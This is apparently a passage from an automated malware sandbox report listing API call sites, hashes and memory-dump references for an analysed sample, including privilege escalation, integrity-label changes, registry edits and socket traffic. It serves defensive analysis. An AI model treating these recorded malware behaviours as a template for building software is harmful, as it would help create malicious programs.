                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3901171168-0
                                                                                                                                                                                                            • Opcode ID: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                            • Instruction ID: 2bcc8de3f8500a2d5a786017364e93b4a93ad66ae90753b004e779cce3e3b6f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47018872E41310ABD7705FA69858F66BB5CEFCCBA27618459E34593240CB306451CFE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustChangeCloseConvertErrorFindFreeInfoLastLocalLookupNamedNotificationPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 141549399-820036962
                                                                                                                                                                                                            • Opcode ID: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                            • Instruction ID: 16766273108d596bcc35d9cfa1f761a8aaf9491b26b9c222b5324296d89d9aae
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09d0a1d324d526fb895626fa839b43ab5b48a4af82d8ea1182306967ae069c2f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8010C75A40128BBEB24DAA59C84EEFBBBDEF44784B404599BA05D3140E770EA15CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,02BB3B17), ref: 02BB3864
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,6988939ca,00000000,?,00000000,?), ref: 02BB3885
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BB3893
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: 6988939ca$software\microsoft
                                                                                                                                                                                                            • API String ID: 3677997916-1519107699
                                                                                                                                                                                                            • Opcode ID: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                            • Instruction ID: e8ca7c269166cf511250656581f828c6c5f1e159dcdc89fe303e5e4156b5c338
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87b5c9d8cef9ae452717c0d4fc2b4666d0c605021700004f1e3171edc234c5bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33F0C9B5A40308FBEB10DBA4CD45BEEBBB8EB04744F504599EA05A7280D7B5A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC412B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,02BC1163,00001000,?,?), ref: 02BC413C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02BC414C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: 34525b1fdb65a966396ad19d55a44d95f992dfe126135816b4b3839e380a1fe7
                                                                                                                                                                                                            • Instruction ID: 9f5fed09a6fdee6697ebc7433c3e9c3afb347f69845fd6f823f705c026dd2543
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34525b1fdb65a966396ad19d55a44d95f992dfe126135816b4b3839e380a1fe7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11E01230BC03005BB7945B75A80DE663BAABB557C83408C65B795D3220EB64D7648750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BC43D9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC440C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4438
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC445F
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BC44DD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                            • Instruction ID: e498500eb31186ac90adcd9cc44349e6c848dbfceec546d5ba50816649e74060
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C410D70D00218AFDB50DFA8D884AEEBBF5EF48704F64856EE955E7240E774AA408F91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCAACC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCAAF1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02BC1A39), ref: 02BCAB71
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02BC1A39), ref: 02BCAB78
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCAB88
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02BC1A39), ref: 02BCAB9D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2033102291-0
                                                                                                                                                                                                            • Opcode ID: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                            • Instruction ID: d5037526b672daaf06a089df85ccf287c31813160e1a430b786f9aab625ff9f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12310B72A0021D5BD7324E289C84BBA7F9BDF41298F3986EDED85C7201D732DD058790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BC42A9
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC42DC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4308
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC432F
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BC43AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                            • Instruction ID: 6101a8163dd7c8d5915ae90fbb4f736d62e8ac0f0f42ddfe30bbdcb0256a592e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9541ED70D40218AFDB50DFA8D494AEEBBF5EF88704F64856EE515E7200E774AA408F91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB13DE
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB141A
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB1446
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB146D
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB1498
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                            • Instruction ID: 4c17c130b265cbd2886f921367a5e7b1fe1dfda08f120123e33cb2aa0ddcda20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf2b6275c89a8345453d2cf863cfa11443b88357e9a03cb164ba124eafc32f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D731CAB1D10209AFDB40DFA8D884AEEBBF9FF4C314F50856AE918E3200E37499418F90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,02BC369B,00000000,00010108,?,00000000), ref: 02BD522F
                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02BD5264
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD528E
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000104,02BC369B), ref: 02BD52A6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD52B2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                            • Opcode ID: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                            • Instruction ID: 847378e8d2e8e4c81ed1ed1ac44c0e094a47d83de2c107671b6735880426f8d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4f668a659048f21157d4c8b8494ba75ef92a0b835b7e300bfda2ba29680f70c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A21C836A40219ABC730DAA8DC44FEAB7BCEB44750F444595FD80EB240E6B0AE548BD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2377537114-0
                                                                                                                                                                                                            • Opcode ID: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                            • Instruction ID: 45e2ff64a7ebbb82d318c23d07de6c8b9f628a28bc6deaf585b51d9442d4cad2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4691f0915c366cd04e191a62b28da9bd4f65198954f3797982a865e3d65c2ab0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21A3B0A102099FD724DF5DD894BAABBF4FF49344F20896CDA8AC3300D7B1A561CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5962
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5995
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB59C1
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB59E8
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5A04
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 0351482601a70b22f00ccccbc5189b670d189094de42473f06f229719d8df5b8
                                                                                                                                                                                                            • Instruction ID: b1ca1ef104e0caab0c0193b3e7754b9c3b09878ff3d125b0aff03c315993d6ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0351482601a70b22f00ccccbc5189b670d189094de42473f06f229719d8df5b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A31ABB1D4120DAFDB40CFA8D885AEEBBF5FB48301F50446AE914E7200E7749A548FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,76F8F380,?,?,02BC0AA8,?), ref: 02BCAA37
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02BC0AA8,?), ref: 02BCAA54
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BC0AA8,?), ref: 02BCAA5B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCAA6B
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02BC0AA8,000000FF,00000000,00000000,00000000,00000000,?,02BC0AA8,?), ref: 02BCAA88
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 913929354-0
                                                                                                                                                                                                            • Opcode ID: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                            • Instruction ID: 074d64bc1903941ca2ddf452b2abdb3c4baf9203cb1065488fea8beb59339597
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d0acf32afe447b8f3f403df49ee879d2881748c56e748c45087dec0916aeed2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F018F726422267BE6314DA99C48FA77F5CDF46BF0F650354BA24EA1C4DB60E900C6F4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3057210225-0
                                                                                                                                                                                                            • Opcode ID: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                            • Instruction ID: 8c64cddd747798962dd52f2ab085f23a808510fb163e4d7ced43e0cde33227a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6dffc0091df58dfdaa6cfb625830f61b6dbe2aea705605e0724a1254d195ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11E171E412585BE72797349D4ABEA376CEF08704F0009E8EB89D3180D7F08D948B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,761E23A0,?,?), ref: 02BC998D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC9994
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC99AF
                                                                                                                                                                                                            • send.WS2_32(?,?,00000000,00000000), ref: 02BC99C0
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC99D9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2415998009-0
                                                                                                                                                                                                            • Opcode ID: 3c92673bbe73a2d05446bf10ff2549189418f6af7adc549a1818d7649238bea3
                                                                                                                                                                                                            • Instruction ID: f49c5bf07bcd40688b868be392a90940f3f64bea19a12c2ba134ed7f93b76c8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c92673bbe73a2d05446bf10ff2549189418f6af7adc549a1818d7649238bea3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE01B1B26402047BE7209B689C45FAB7B6CEB49740F144099BB04EB181D6B4A9418BB4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000), ref: 02BBD242
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02BBD259
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BBD26F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BBD280
                                                                                                                                                                                                            • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02BBD297
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1270303404-0
                                                                                                                                                                                                            • Opcode ID: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
                                                                                                                                                                                                            • Instruction ID: 6cabf42b3b44b32cbc06daf427477132f02397d9518f7fca14231668187d59b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19af8b8f19db094c32ef9398aeeb80a29694cfdbef6d33dabd457ec4cba11017
